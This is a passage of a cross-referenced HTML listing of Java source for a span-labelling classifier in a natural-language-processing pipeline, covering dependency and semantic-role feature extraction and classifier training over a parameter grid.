<a class="jxr_linenumber" name="L276" href="#L276">276</a> <em class="jxr_comment">// builder.set("root.pos." + rootTerm.getMorphofeat().substring(0, 1));</em>
<a class="jxr_linenumber" name="L277" href="#L277">277</a> <em class="jxr_comment">// builder.set("root.named", rootTerm.getMorphofeat().startsWith("NNP"));</em>
<a class="jxr_linenumber" name="L278" href="#L278">278</a> <em class="jxr_comment">// }</em>
<a class="jxr_linenumber" name="L279" href="#L279">279</a>
<a class="jxr_linenumber" name="L280" href="#L280">280</a> <em class="jxr_comment">// Add parent features</em>
<a class="jxr_linenumber" name="L281" href="#L281">281</a> <em class="jxr_comment">// builder.set("parent.pos." + parentTerm.getPos());</em>
<a class="jxr_linenumber" name="L282" href="#L282">282</a> builder.set(<span class="jxr_string">"parent.pos."</span> + parentTerm.getMorphofeat().substring(0, 1));
<a class="jxr_linenumber" name="L283" href="#L283">283</a> builder.set(<span class="jxr_string">"parent.named"</span>, parentTerm.getMorphofeat().startsWith(<span class="jxr_string">"NNP"</span>));
<a class="jxr_linenumber" name="L284" href="#L284">284</a> builder.set(<span class="jxr_string">"parent.lemma."</span> + parentTerm.getLemma().toLowerCase());
<a class="jxr_linenumber" name="L285" href="#L285">285</a> builder.set(<span class="jxr_string">"parent.morph."</span> + parentTerm.getMorphofeat());
<a class="jxr_linenumber" name="L286" href="#L286">286</a>
<a class="jxr_linenumber" name="L287" href="#L287">287</a> <em class="jxr_comment">// builder.set("parent.entity", !document.getEntitiesByTerm(parentTerm).isEmpty());</em>
<a class="jxr_linenumber" name="L288" href="#L288">288</a> <em class="jxr_comment">// builder.set("parent.timex",</em>
<a class="jxr_linenumber" name="L289" href="#L289">289</a> <em class="jxr_comment">// !document.getTimeExsByWF(parentTerm.getWFs().get(0)).isEmpty());</em>
<a class="jxr_linenumber" name="L290" href="#L290">290</a> <em class="jxr_comment">// builder.set("parent.predicate", !document.getPredicatesByTerm(parentTerm).isEmpty());</em>
<a class="jxr_linenumber" name="L291" href="#L291">291</a> <em class="jxr_comment">// builder.set(features("parent.sst.", parentTerm, NAFUtils.RESOURCE_WN_SST));</em>
<a class="jxr_linenumber" name="L292" href="#L292">292</a>
<a class="jxr_linenumber" name="L293" href="#L293">293</a> <em class="jxr_comment">// Add child features</em>
<a class="jxr_linenumber" name="L294" href="#L294">294</a> <em class="jxr_comment">// builder.set("child.pos." + childTerm.getPos());</em>
<a class="jxr_linenumber" name="L295" href="#L295">295</a> builder.set(<span class="jxr_string">"child.pos."</span> + childTerm.getMorphofeat().substring(0, 1));
<a class="jxr_linenumber" name="L296" href="#L296">296</a> builder.set(<span class="jxr_string">"child.named"</span>, childTerm.getMorphofeat().startsWith(<span class="jxr_string">"NNP"</span>));
<a class="jxr_linenumber" name="L297" href="#L297">297</a> builder.set(<span class="jxr_string">"child.lemma."</span> + childTerm.getLemma().toLowerCase());
<a class="jxr_linenumber" name="L298" href="#L298">298</a> builder.set(<span class="jxr_string">"child.morph."</span> + childTerm.getMorphofeat());
<a class="jxr_linenumber" name="L299" href="#L299">299</a> <em class="jxr_comment">// builder.set("child.entity", !document.getEntitiesByTerm(childTerm).isEmpty());</em>
<a class="jxr_linenumber" name="L300" href="#L300">300</a> <em class="jxr_comment">// builder.set("child.timex",</em>
<a class="jxr_linenumber" name="L301" href="#L301">301</a> <em class="jxr_comment">// !document.getTimeExsByWF(childTerm.getWFs().get(0)).isEmpty());</em>
<a class="jxr_linenumber" name="L302" href="#L302">302</a> <em class="jxr_comment">// builder.set("child.predicate", !document.getPredicatesByTerm(childTerm).isEmpty());</em>
<a class="jxr_linenumber" name="L303" href="#L303">303</a> <em class="jxr_comment">// builder.set(features("child.sst.", childTerm, NAFUtils.RESOURCE_WN_SST));</em>
<a class="jxr_linenumber" name="L304" href="#L304">304</a>
<a class="jxr_linenumber" name="L305" href="#L305">305</a> <em class="jxr_comment">// for (final Entity entity : document.getEntitiesByTerm(childTerm)) {</em>
<a class="jxr_linenumber" name="L306" href="#L306">306</a> <em class="jxr_comment">// if (entity.getType() != null) {</em>
<a class="jxr_linenumber" name="L307" href="#L307">307</a> <em class="jxr_comment">// builder.set("child.entity." + entity.getType().toLowerCase());</em>
<a class="jxr_linenumber" name="L308" href="#L308">308</a> <em class="jxr_comment">// }</em>
<a class="jxr_linenumber" name="L309" href="#L309">309</a> <em class="jxr_comment">// }</em>
<a class="jxr_linenumber" name="L310" href="#L310">310</a> <em class="jxr_comment">// for (final Entity entity : document.getEntitiesBySent(childTerm.getSent())) {</em>
<a class="jxr_linenumber" name="L311" href="#L311">311</a> <em class="jxr_comment">// if (entity.getType() != null</em>
<a class="jxr_linenumber" name="L312" href="#L312">312</a> <em class="jxr_comment">// && entity.isNamed()</em>
<a class="jxr_linenumber" name="L313" href="#L313">313</a> <em class="jxr_comment">// && !Sets.intersection(ImmutableSet.copyOf(entity.getTerms()), descendants)</em>
<a class="jxr_linenumber" name="L314" href="#L314">314</a> <em class="jxr_comment">// .isEmpty()) {</em>
<a class="jxr_linenumber" name="L315" href="#L315">315</a> <em class="jxr_comment">// builder.set("child.entity");</em>
<a class="jxr_linenumber" name="L316" href="#L316">316</a> <em class="jxr_comment">// builder.set("child.entity." + entity.getType().toLowerCase());</em>
<a class="jxr_linenumber" name="L317" href="#L317">317</a> <em class="jxr_comment">// }</em>
<a class="jxr_linenumber" name="L318" href="#L318">318</a> <em class="jxr_comment">// }</em>
<a class="jxr_linenumber" name="L319" href="#L319">319</a>
<a class="jxr_linenumber" name="L320" href="#L320">320</a> <strong class="jxr_keyword">for</strong> (<strong class="jxr_keyword">final</strong> Dep childDep : document.getDepsFromTerm(childHead)) {
<a class="jxr_linenumber" name="L321" href="#L321">321</a> <strong class="jxr_keyword">final</strong> <a href="../../../../../../ixa/kaflib/Term.html">Term</a> to = childDep.getTo();
<a class="jxr_linenumber" name="L322" href="#L322">322</a> <em class="jxr_comment">// final boolean before = to.getOffset() < childHead.getOffset();</em>
<a class="jxr_linenumber" name="L323" href="#L323">323</a> <em class="jxr_comment">// builder.set("depdown." + childDep.getRfunc() + "." + (before ? "before" :</em>
<a class="jxr_linenumber" name="L324" href="#L324">324</a> <em class="jxr_comment">// "after"));</em>
<a class="jxr_linenumber" name="L325" href="#L325">325</a> builder.set(<span class="jxr_string">"depdown."</span> + childDep.getRfunc() + <span class="jxr_string">"."</span>
<a class="jxr_linenumber" name="L326" href="#L326">326</a> + to.getMorphofeat().substring(0, 1));
<a class="jxr_linenumber" name="L327" href="#L327">327</a> }
<a class="jxr_linenumber" name="L328" href="#L328">328</a> <em class="jxr_comment">// builder.set("dep.path." + path);</em>
<a class="jxr_linenumber" name="L329" href="#L329">329</a> <em class="jxr_comment">// builder.set("dep.pospath." + path + "-" + childTerm.getPos());</em>
<a class="jxr_linenumber" name="L330" href="#L330">330</a> <em class="jxr_comment">// builder.set("dep.pospath." + parentTerm.getPos() + "-" + path + "-" +</em>
<a class="jxr_linenumber" name="L331" href="#L331">331</a> <em class="jxr_comment">// childTerm.getPos());</em>
<a class="jxr_linenumber" name="L332" href="#L332">332</a> <em class="jxr_comment">// builder.set("deppos." + dep.getRfunc() + "." + childTerm.getMorphofeat());</em>
<a class="jxr_linenumber" name="L333" href="#L333">333</a> builder.set(<span class="jxr_string">"dep."</span> + pathex);
<a class="jxr_linenumber" name="L334" href="#L334">334</a>
<a class="jxr_linenumber" name="L335" href="#L335">335</a> builder.set(<span class="jxr_string">"dep."</span> + (depth == 0 ? <span class="jxr_string">"top."</span> : <span class="jxr_string">"nested."</span>) + dep.getRfunc());
<a class="jxr_linenumber" name="L336" href="#L336">336</a> <strong class="jxr_keyword">if</strong> (dep.getRfunc().equals(<span class="jxr_string">"COORD"</span>)) {
<a class="jxr_linenumber" name="L337" href="#L337">337</a> <em class="jxr_comment">// System.out.println("*** " + parent.getStr() + " --> " + child.getStr());</em>
<a class="jxr_linenumber" name="L338" href="#L338">338</a> }
<a class="jxr_linenumber" name="L339" href="#L339">339</a> <em class="jxr_comment">// builder.set("dep.funcpos." + (childIndex > parentIndex ? "after." : "before.")</em>
<a class="jxr_linenumber" name="L340" href="#L340">340</a> <em class="jxr_comment">// + dep.getRfunc() + "." + childTerm.getMorphofeat());</em>
<a class="jxr_linenumber" name="L341" href="#L341">341</a> <strong class="jxr_keyword">if</strong> (!child.getTargets().contains(dep.getTo())) {
<a class="jxr_linenumber" name="L342" href="#L342">342</a> <em class="jxr_comment">// builder.set("dep.funcposconn." + dep.getRfunc() + "." + childTerm.getMorphofeat()</em>
<a class="jxr_linenumber" name="L343" href="#L343">343</a> <em class="jxr_comment">// + "." + dep.getTo().getLemma().toLowerCase());</em>
<a class="jxr_linenumber" name="L344" href="#L344">344</a> <em class="jxr_comment">// builder.set("dep.funcposconn." + (childIndex > parentIndex ? "after." : "before.")</em>
<a class="jxr_linenumber" name="L345" href="#L345">345</a> <em class="jxr_comment">// + dep.getRfunc() + "." + childTerm.getMorphofeat() + "."</em>
<a class="jxr_linenumber" name="L346" href="#L346">346</a> <em class="jxr_comment">// + dep.getTo().getLemma().toLowerCase());</em>
<a class="jxr_linenumber" name="L347" href="#L347">347</a> }
<a class="jxr_linenumber" name="L348" href="#L348">348</a>
<a class="jxr_linenumber" name="L349" href="#L349">349</a> <em class="jxr_comment">// Emit SRL features</em>
<a class="jxr_linenumber" name="L350" href="#L350">350</a> <strong class="jxr_keyword">for</strong> (<strong class="jxr_keyword">final</strong> Predicate predicate : document.getPredicatesByTerm(parentTerm)) {
<a class="jxr_linenumber" name="L351" href="#L351">351</a> <strong class="jxr_keyword">for</strong> (<strong class="jxr_keyword">final</strong> Role role : predicate.getRoles()) {
<a class="jxr_linenumber" name="L352" href="#L352">352</a> <strong class="jxr_keyword">if</strong> (role.getTerms().contains(childTerm)) {
<a class="jxr_linenumber" name="L353" href="#L353">353</a> builder.set(<span class="jxr_string">"srl."</span> + role.getSemRole());
<a class="jxr_linenumber" name="L354" href="#L354">354</a> }
<a class="jxr_linenumber" name="L355" href="#L355">355</a> }
<a class="jxr_linenumber" name="L356" href="#L356">356</a> }
<a class="jxr_linenumber" name="L357" href="#L357">357</a>
<a class="jxr_linenumber" name="L358" href="#L358">358</a> <em class="jxr_comment">// Finalize the construction and return the resulting feature vector</em>
<a class="jxr_linenumber" name="L359" href="#L359">359</a> <strong class="jxr_keyword">return</strong> builder.build();
<a class="jxr_linenumber" name="L360" href="#L360">360</a> }
<a class="jxr_linenumber" name="L361" href="#L361">361</a>
<a class="jxr_linenumber" name="L362" href="#L362">362</a> <strong class="jxr_keyword">private</strong> <strong class="jxr_keyword">static</strong> Span<Term> getMinimalSpan(<strong class="jxr_keyword">final</strong> <a href="../../../../../../ixa/kaflib/KAFDocument.html">KAFDocument</a> document, <strong class="jxr_keyword">final</strong> <a href="../../../../../../ixa/kaflib/Term.html">Term</a> term) {
<a class="jxr_linenumber" name="L363" href="#L363">363</a>
<a class="jxr_linenumber" name="L364" href="#L364">364</a> <em class="jxr_comment">// The minimal span for a term includes all the terms of a named entity covering the input</em>
<a class="jxr_linenumber" name="L365" href="#L365">365</a> <em class="jxr_comment">// term, as well as all terms reachable through IM/VC links (this allows keeping together</em>
<a class="jxr_linenumber" name="L366" href="#L366">366</a> <em class="jxr_comment">// verbal expressions such as would like, going to do...)</em>
<a class="jxr_linenumber" name="L367" href="#L367">367</a> <strong class="jxr_keyword">final</strong> Set<Term> terms = Sets.newHashSet(term);
<a class="jxr_linenumber" name="L368" href="#L368">368</a> <strong class="jxr_keyword">for</strong> (<strong class="jxr_keyword">final</strong> Entity entity : document.getEntitiesByTerm(term)) {
<a class="jxr_linenumber" name="L369" href="#L369">369</a> <strong class="jxr_keyword">if</strong> (document.getTermsHead(Iterables.concat(terms, entity.getTerms())) != <strong class="jxr_keyword">null</strong>) {
<a class="jxr_linenumber" name="L370" href="#L370">370</a> terms.addAll(entity.getTerms());
<a class="jxr_linenumber" name="L371" href="#L371">371</a> }
<a class="jxr_linenumber" name="L372" href="#L372">372</a> }
<a class="jxr_linenumber" name="L373" href="#L373">373</a> <strong class="jxr_keyword">final</strong> List<Term> queue = Lists.newLinkedList(terms);
<a class="jxr_linenumber" name="L374" href="#L374">374</a> <strong class="jxr_keyword">while</strong> (!queue.isEmpty()) {
<a class="jxr_linenumber" name="L375" href="#L375">375</a> <strong class="jxr_keyword">final</strong> <a href="../../../../../../ixa/kaflib/Term.html">Term</a> t = queue.remove(0);
<a class="jxr_linenumber" name="L376" href="#L376">376</a> <strong class="jxr_keyword">for</strong> (<strong class="jxr_keyword">final</strong> Dep dep : document.getDepsByTerm(t)) {
<a class="jxr_linenumber" name="L377" href="#L377">377</a> <strong class="jxr_keyword">if</strong> (dep.getRfunc().equals(<span class="jxr_string">"VC"</span>) || dep.getRfunc().equals(<span class="jxr_string">"IM"</span>)) {
<a class="jxr_linenumber" name="L378" href="#L378">378</a> <strong class="jxr_keyword">if</strong> (terms.add(dep.getFrom())) {
<a class="jxr_linenumber" name="L379" href="#L379">379</a> queue.add(dep.getFrom());
<a class="jxr_linenumber" name="L380" href="#L380">380</a> }
<a class="jxr_linenumber" name="L381" href="#L381">381</a> <strong class="jxr_keyword">if</strong> (terms.add(dep.getTo())) {
<a class="jxr_linenumber" name="L382" href="#L382">382</a> queue.add(dep.getTo());
<a class="jxr_linenumber" name="L383" href="#L383">383</a> }
<a class="jxr_linenumber" name="L384" href="#L384">384</a> }
<a class="jxr_linenumber" name="L385" href="#L385">385</a> }
<a class="jxr_linenumber" name="L386" href="#L386">386</a> }
<a class="jxr_linenumber" name="L387" href="#L387">387</a> <strong class="jxr_keyword">final</strong> <a href="../../../../../../ixa/kaflib/Term.html">Term</a> head = document.getTermsHead(terms);
<a class="jxr_linenumber" name="L388" href="#L388">388</a> <strong class="jxr_keyword">return</strong> KAFDocument.newTermSpan(Ordering.from(Term.OFFSET_COMPARATOR).sortedCopy(terms),
<a class="jxr_linenumber" name="L389" href="#L389">389</a> head);
<a class="jxr_linenumber" name="L390" href="#L390">390</a> }
<a class="jxr_linenumber" name="L391" href="#L391">391</a>
<a class="jxr_linenumber" name="L392" href="#L392">392</a> <strong class="jxr_keyword">private</strong> <strong class="jxr_keyword">static</strong> <a href="../../../../../../ixa/kaflib/Term.html">Term</a> getMainTerm(<strong class="jxr_keyword">final</strong> <a href="../../../../../../ixa/kaflib/KAFDocument.html">KAFDocument</a> document, <strong class="jxr_keyword">final</strong> Span<Term> span) {
<a class="jxr_linenumber" name="L393" href="#L393">393</a> @SuppressWarnings(<span class="jxr_string">"deprecation"</span>)
<a class="jxr_linenumber" name="L394" href="#L394">394</a> <a href="../../../../../../ixa/kaflib/Term.html">Term</a> term = span.getHead();
<a class="jxr_linenumber" name="L395" href="#L395">395</a> <strong class="jxr_keyword">if</strong> (term == <strong class="jxr_keyword">null</strong>) {
<a class="jxr_linenumber" name="L396" href="#L396">396</a> term = document.getTermsHead(span.getTargets());
<a class="jxr_linenumber" name="L397" href="#L397">397</a> span.setHead(term);
<a class="jxr_linenumber" name="L398" href="#L398">398</a> }
<a class="jxr_linenumber" name="L399" href="#L399">399</a> <strong class="jxr_keyword">outer</strong>: <strong class="jxr_keyword">while</strong> (<strong class="jxr_keyword">true</strong>) {
<a class="jxr_linenumber" name="L400" href="#L400">400</a> <strong class="jxr_keyword">for</strong> (<strong class="jxr_keyword">final</strong> Dep dep : document.getDepsFromTerm(term)) {
<a class="jxr_linenumber" name="L401" href="#L401">401</a> <strong class="jxr_keyword">if</strong> (dep.getRfunc().equals(<span class="jxr_string">"VC"</span>) || dep.getRfunc().equals(<span class="jxr_string">"IM"</span>)) {
<a class="jxr_linenumber" name="L402" href="#L402">402</a> term = dep.getTo();
<a class="jxr_linenumber" name="L403" href="#L403">403</a> <strong class="jxr_keyword">continue</strong> <strong class="jxr_keyword">outer</strong>;
<a class="jxr_linenumber" name="L404" href="#L404">404</a> }
<a class="jxr_linenumber" name="L405" href="#L405">405</a> }
<a class="jxr_linenumber" name="L406" href="#L406">406</a> <strong class="jxr_keyword">break</strong>;
<a class="jxr_linenumber" name="L407" href="#L407">407</a> }
<a class="jxr_linenumber" name="L408" href="#L408">408</a> <strong class="jxr_keyword">return</strong> term;
<a class="jxr_linenumber" name="L409" href="#L409">409</a> }
<a class="jxr_linenumber" name="L410" href="#L410">410</a>
<a class="jxr_linenumber" name="L411" href="#L411">411</a> <strong class="jxr_keyword">private</strong> <strong class="jxr_keyword">static</strong> <strong class="jxr_keyword">int</strong> getSpanOffset(<strong class="jxr_keyword">final</strong> Span<Term> span) {
<a class="jxr_linenumber" name="L412" href="#L412">412</a> <strong class="jxr_keyword">int</strong> offset = Integer.MAX_VALUE;
<a class="jxr_linenumber" name="L413" href="#L413">413</a> <strong class="jxr_keyword">for</strong> (<strong class="jxr_keyword">final</strong> Term term : span.getTargets()) {
<a class="jxr_linenumber" name="L414" href="#L414">414</a> offset = Math.min(term.getOffset(), offset);
<a class="jxr_linenumber" name="L415" href="#L415">415</a> }
<a class="jxr_linenumber" name="L416" href="#L416">416</a> <strong class="jxr_keyword">return</strong> offset;
<a class="jxr_linenumber" name="L417" href="#L417">417</a> }
<a class="jxr_linenumber" name="L418" href="#L418">418</a>
<a class="jxr_linenumber" name="L419" href="#L419">419</a> <strong class="jxr_keyword">public</strong> <strong class="jxr_keyword">void</strong> writeTo(<strong class="jxr_keyword">final</strong> <a href="../../../../../../ixa/kaflib/Dep.html">Path</a> path) <strong class="jxr_keyword">throws</strong> IOException {
<a class="jxr_linenumber" name="L420" href="#L420">420</a> <strong class="jxr_keyword">this</strong>.classifier.writeTo(path);
<a class="jxr_linenumber" name="L421" href="#L421">421</a> }
<a class="jxr_linenumber" name="L422" href="#L422">422</a>
<a class="jxr_linenumber" name="L423" href="#L423">423</a> @Override
<a class="jxr_linenumber" name="L424" href="#L424">424</a> <strong class="jxr_keyword">public</strong> <strong class="jxr_keyword">boolean</strong> equals(<strong class="jxr_keyword">final</strong> Object object) {
<a class="jxr_linenumber" name="L425" href="#L425">425</a> <strong class="jxr_keyword">if</strong> (object == <strong class="jxr_keyword">this</strong>) {
<a class="jxr_linenumber" name="L426" href="#L426">426</a> <strong class="jxr_keyword">return</strong> <strong class="jxr_keyword">true</strong>;
<a class="jxr_linenumber" name="L427" href="#L427">427</a> }
<a class="jxr_linenumber" name="L428" href="#L428">428</a> <strong class="jxr_keyword">if</strong> (!(object instanceof SpanLabeller)) {
<a class="jxr_linenumber" name="L429" href="#L429">429</a> <strong class="jxr_keyword">return</strong> false;
<a class="jxr_linenumber" name="L430" href="#L430">430</a> }
<a class="jxr_linenumber" name="L431" href="#L431">431</a> <strong class="jxr_keyword">final</strong> <a href="../../../../../../eu/fbk/dkm/pikes/raid/pipeline/SpanLabeller.html">SpanLabeller</a> other = (SpanLabeller) object;
<a class="jxr_linenumber" name="L432" href="#L432">432</a> <strong class="jxr_keyword">return</strong> <strong class="jxr_keyword">this</strong>.classifier.equals(other.classifier);
<a class="jxr_linenumber" name="L433" href="#L433">433</a> }
<a class="jxr_linenumber" name="L434" href="#L434">434</a>
<a class="jxr_linenumber" name="L435" href="#L435">435</a> @Override
<a class="jxr_linenumber" name="L436" href="#L436">436</a> <strong class="jxr_keyword">public</strong> <strong class="jxr_keyword">int</strong> hashCode() {
<a class="jxr_linenumber" name="L437" href="#L437">437</a> <strong class="jxr_keyword">return</strong> <strong class="jxr_keyword">this</strong>.classifier.hashCode();
<a class="jxr_linenumber" name="L438" href="#L438">438</a> }
<a class="jxr_linenumber" name="L439" href="#L439">439</a>
<a class="jxr_linenumber" name="L440" href="#L440">440</a> @Override
<a class="jxr_linenumber" name="L441" href="#L441">441</a> <strong class="jxr_keyword">public</strong> String toString() {
<a class="jxr_linenumber" name="L442" href="#L442">442</a> <strong class="jxr_keyword">return</strong> <span class="jxr_string">"HeadExpander ("</span> + <strong class="jxr_keyword">this</strong>.classifier.toString() + <span class="jxr_string">")"</span>;
<a class="jxr_linenumber" name="L443" href="#L443">443</a> }
<a class="jxr_linenumber" name="L444" href="#L444">444</a>
<a class="jxr_linenumber" name="L445" href="#L445">445</a> <strong class="jxr_keyword">public</strong> <strong class="jxr_keyword">static</strong> <a href="../../../../../../eu/fbk/dkm/pikes/raid/pipeline/LinkLabeller.html">Trainer</a> train() {
<a class="jxr_linenumber" name="L446" href="#L446">446</a> <strong class="jxr_keyword">return</strong> <strong class="jxr_keyword">new</strong> <a href="../../../../../../eu/fbk/dkm/pikes/raid/pipeline/LinkLabeller.html">Trainer</a>();
<a class="jxr_linenumber" name="L447" href="#L447">447</a> }
<a class="jxr_linenumber" name="L448" href="#L448">448</a>
<a class="jxr_linenumber" name="L449" href="#L449">449</a> <strong class="jxr_keyword">public</strong> <strong class="jxr_keyword">static</strong> <strong class="jxr_keyword">final</strong> <strong class="jxr_keyword">class</strong> <a href="../../../../../../eu/fbk/dkm/pikes/raid/pipeline/LinkLabeller.html">Trainer</a> {
<a class="jxr_linenumber" name="L450" href="#L450">450</a>
<a class="jxr_linenumber" name="L451" href="#L451">451</a> <strong class="jxr_keyword">private</strong> <strong class="jxr_keyword">final</strong> List<LabelledVector> trainingSet;
<a class="jxr_linenumber" name="L452" href="#L452">452</a>
<a class="jxr_linenumber" name="L453" href="#L453">453</a> <strong class="jxr_keyword">private</strong> <strong class="jxr_keyword">final</strong> SetPrecisionRecall.Evaluator evaluator;
<a class="jxr_linenumber" name="L454" href="#L454">454</a>
<a class="jxr_linenumber" name="L455" href="#L455">455</a> <strong class="jxr_keyword">private</strong> <a href="../../../../../../eu/fbk/dkm/pikes/raid/pipeline/LinkLabeller.html">Trainer</a>() {
<a class="jxr_linenumber" name="L456" href="#L456">456</a> <strong class="jxr_keyword">this</strong>.trainingSet = Lists.newArrayList();
<a class="jxr_linenumber" name="L457" href="#L457">457</a> <strong class="jxr_keyword">this</strong>.evaluator = SetPrecisionRecall.evaluator();
<a class="jxr_linenumber" name="L458" href="#L458">458</a> }
<a class="jxr_linenumber" name="L459" href="#L459">459</a>
<a class="jxr_linenumber" name="L460" href="#L460">460</a> <strong class="jxr_keyword">public</strong> <strong class="jxr_keyword">void</strong> add(<strong class="jxr_keyword">final</strong> <a href="../../../../../../ixa/kaflib/KAFDocument.html">KAFDocument</a> document, <strong class="jxr_keyword">final</strong> <a href="../../../../../../ixa/kaflib/Term.html">Term</a> head,
<a class="jxr_linenumber" name="L461" href="#L461">461</a> <strong class="jxr_keyword">final</strong> Iterable<Term> excluded, <strong class="jxr_keyword">final</strong> Span<Term> span) {
<a class="jxr_linenumber" name="L462" href="#L462">462</a>
<a class="jxr_linenumber" name="L463" href="#L463">463</a> <strong class="jxr_keyword">final</strong> Set<Term> spanTerms = ImmutableSet.copyOf(span.getTargets());
<a class="jxr_linenumber" name="L464" href="#L464">464</a> <strong class="jxr_keyword">final</strong> Set<Term> excludedTerms = ImmutableSet.copyOf(excluded);
<a class="jxr_linenumber" name="L465" href="#L465">465</a>
<a class="jxr_linenumber" name="L466" href="#L466">466</a> <strong class="jxr_keyword">final</strong> Span<Term> outSpan = expand(document, <strong class="jxr_keyword">new</strong> <a href="../../../../../../eu/fbk/dkm/pikes/raid/pipeline/SpanLabeller.html">Predictor</a>() {
<a class="jxr_linenumber" name="L467" href="#L467">467</a>
<a class="jxr_linenumber" name="L468" href="#L468">468</a> @Override
<a class="jxr_linenumber" name="L469" href="#L469">469</a> <strong class="jxr_keyword">public</strong> LabelledVector predict(<strong class="jxr_keyword">final</strong> Vector vector) {
<a class="jxr_linenumber" name="L470" href="#L470">470</a> <strong class="jxr_keyword">final</strong> <a href="../../../../../../ixa/kaflib/Term.html">Term</a> term = document.getTerms().get((<strong class="jxr_keyword">int</strong>) vector.getValue(<span class="jxr_string">"_index"</span>));
<a class="jxr_linenumber" name="L471" href="#L471">471</a> <strong class="jxr_keyword">final</strong> <strong class="jxr_keyword">boolean</strong> included = spanTerms.contains(term)
<a class="jxr_linenumber" name="L472" href="#L472">472</a> && !excludedTerms.contains(term);
<a class="jxr_linenumber" name="L473" href="#L473">473</a> <strong class="jxr_keyword">final</strong> LabelledVector result = vector.label(included ? 1 : 0);
<a class="jxr_linenumber" name="L474" href="#L474">474</a> Trainer.<strong class="jxr_keyword">this</strong>.trainingSet.add(result);
<a class="jxr_linenumber" name="L475" href="#L475">475</a> <strong class="jxr_keyword">return</strong> result;
<a class="jxr_linenumber" name="L476" href="#L476">476</a> }
<a class="jxr_linenumber" name="L477" href="#L477">477</a>
<a class="jxr_linenumber" name="L478" href="#L478">478</a> }, excluded, getMinimalSpan(document, head));
<a class="jxr_linenumber" name="L479" href="#L479">479</a>
<a class="jxr_linenumber" name="L480" href="#L480">480</a> <strong class="jxr_keyword">this</strong>.evaluator.add(ImmutableList.of(spanTerms),
<a class="jxr_linenumber" name="L481" href="#L481">481</a> ImmutableList.of(ImmutableSet.copyOf(outSpan.getTargets())));
<a class="jxr_linenumber" name="L482" href="#L482">482</a> }
<a class="jxr_linenumber" name="L483" href="#L483">483</a>
<a class="jxr_linenumber" name="L484" href="#L484">484</a> <strong class="jxr_keyword">public</strong> <a href="../../../../../../eu/fbk/dkm/pikes/raid/pipeline/SpanLabeller.html">SpanLabeller</a> end(<strong class="jxr_keyword">final</strong> <strong class="jxr_keyword">int</strong> gridSize, <strong class="jxr_keyword">final</strong> <strong class="jxr_keyword">boolean</strong> analyze,
<a class="jxr_linenumber" name="L485" href="#L485">485</a> <strong class="jxr_keyword">final</strong> <strong class="jxr_keyword">boolean</strong> fastClassifier) <strong class="jxr_keyword">throws</strong> IOException {
<a class="jxr_linenumber" name="L486" href="#L486">486</a>
<a class="jxr_linenumber" name="L487" href="#L487">487</a> <em class="jxr_comment">// Emit feature stats if enabled</em>
<a class="jxr_linenumber" name="L488" href="#L488">488</a> <strong class="jxr_keyword">if</strong> (analyze && LOGGER.isInfoEnabled()) {
<a class="jxr_linenumber" name="L489" href="#L489">489</a> LOGGER.info(<span class="jxr_string">"Feature analysis (top 30 features):\n{}"</span>, FeatureStats.toString(
<a class="jxr_linenumber" name="L490" href="#L490">490</a> FeatureStats.forVectors(2, <strong class="jxr_keyword">this</strong>.trainingSet, <strong class="jxr_keyword">null</strong>).values(), 30));
<a class="jxr_linenumber" name="L491" href="#L491">491</a> }
<a class="jxr_linenumber" name="L492" href="#L492">492</a>
<a class="jxr_linenumber" name="L493" href="#L493">493</a> <em class="jxr_comment">// Log the performance penalty caused by the candidate selection algorithm</em>
<a class="jxr_linenumber" name="L494" href="#L494">494</a> LOGGER.info(<span class="jxr_string">"Maximum achievable performances on training set due to recursive "</span>
<a class="jxr_linenumber" name="L495" href="#L495">495</a> + <span class="jxr_string">"algorithm: "</span> + <strong class="jxr_keyword">this</strong>.evaluator.getResult());
<a class="jxr_linenumber" name="L496" href="#L496">496</a>
<a class="jxr_linenumber" name="L497" href="#L497">497</a> <em class="jxr_comment">// Perform training considering a grid of parameters of the size specified (min 1)</em>
<a class="jxr_linenumber" name="L498" href="#L498">498</a> <em class="jxr_comment">// final List<Classifier.Parameters> grid =</em>
<a class="jxr_linenumber" name="L499" href="#L499">499</a> <em class="jxr_comment">// Classifier.Parameters.forLinearLRLossL1Reg(2,</em>
<a class="jxr_linenumber" name="L500" href="#L500">500</a> <em class="jxr_comment">// new float[] { 1f, 1f }, 1f, 1f).grid(Math.max(1, gridSize), 10.0f);</em>
<a class="jxr_linenumber" name="L501" href="#L501">501</a> <strong class="jxr_keyword">final</strong> List<Classifier.Parameters> grid = Lists.newArrayList();
<a class="jxr_linenumber" name="L502" href="#L502">502</a> <strong class="jxr_keyword">for</strong> (<strong class="jxr_keyword">final</strong> <strong class="jxr_keyword">float</strong> weight : <strong class="jxr_keyword">new</strong> <strong class="jxr_keyword">float</strong>[] { 0.25f, 0.5f, 1.0f, 2.0f, 4.0f }) {
<a class="jxr_linenumber" name="L503" href="#L503">503</a> <em class="jxr_comment">// grid.addAll(Classifier.Parameters.forSVMPolyKernel(2, new float[] { 1f, weight</em>
<a class="jxr_linenumber" name="L504" href="#L504">504</a> <em class="jxr_comment">// },</em>
<a class="jxr_linenumber" name="L505" href="#L505">505</a> <em class="jxr_comment">// 1f, 1f, 0.0f, 3).grid(Math.max(1, gridSize), 10.0f));</em>
<a class="jxr_linenumber" name="L506" href="#L506">506</a> <strong class="jxr_keyword">if</strong> (fastClassifier) {
<a class="jxr_linenumber" name="L507" href="#L507">507</a> grid.addAll(Classifier.Parameters.forLinearLRLossL1Reg(2,
<a class="jxr_linenumber" name="L508" href="#L508">508</a> <strong class="jxr_keyword">new</strong> <strong class="jxr_keyword">float</strong>[] { 1f, weight }, 1f, 1f).grid(Math.max(1, gridSize), 10.0f));
<a class="jxr_linenumber" name="L509" href="#L509">509</a> } <strong class="jxr_keyword">else</strong> {
<a class="jxr_linenumber" name="L510" href="#L510">510</a> grid.addAll(Classifier.Parameters.forSVMLinearKernel(2,
<a class="jxr_linenumber" name="L511" href="#L511">511</a> <strong class="jxr_keyword">new</strong> <strong class="jxr_keyword">float</strong>[] { 1f, weight }, 1f).grid(Math.max(1, gridSize), 10.0f));
<a class="jxr_linenumber" name="L512" href="#L512">512</a> }
<a class="jxr_linenumber" name="L513" href="#L513">513</a> }
<a class="jxr_linenumber" name="L514" href="#L514">514</a> <strong class="jxr_keyword">final</strong> Classifier classifier = Classifier.train(grid, <strong class="jxr_keyword">this</strong>.trainingSet,
<a class="jxr_linenumber" name="L515" href="#L515">515</a> ConfusionMatrix.labelComparator(PrecisionRecall.Measure.F1, 1, <strong class="jxr_keyword">true</strong>), 100000);
<a class="jxr_linenumber" name="L516" href="#L516">516</a>
